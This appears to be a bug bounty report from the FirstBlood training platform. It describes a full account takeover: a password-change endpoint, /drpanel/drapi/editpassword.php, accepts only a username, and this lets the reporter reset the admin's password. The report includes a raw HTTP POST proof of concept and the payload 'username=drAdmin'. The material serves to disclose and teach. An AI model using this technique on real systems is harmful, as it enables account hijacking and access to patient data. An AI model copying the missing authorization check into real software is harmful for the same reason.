FirstBlood-#706Full Account takeover (even for admins)
This issue was discovered on FirstBlood v2 (issues patched)



On 2021-10-27, 0xsaltyhash Level 2 reported:

Summary:

There is a commented out snippet of js code on /drpanel/index.php this code is for changing password of a user, the js code is incomplete but one can fill in the blanks easily.

so i guessed that there is an endpoint /drpanel/drapi/editpassword.php that accepts a post request and username body parameter, so i tried it and used it on my logged in user and it succeeded so why stop there, i know from v1 that the admin account username is drAdmin so i tried it and indeed i was able to change password of drAdmin and log in successfully.

POC:

POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: <your_instance>.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

username=drAdmin

me logged in and able to view appointments of patients (which I couldn't do with my self registered user)

Impact:

I can takeover any user by just knowing the username.

P1 CRITICAL

Endpoint: /drpanel/drapi/editpassword.php

Parameter: username

Payload: username=drAdmin


FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.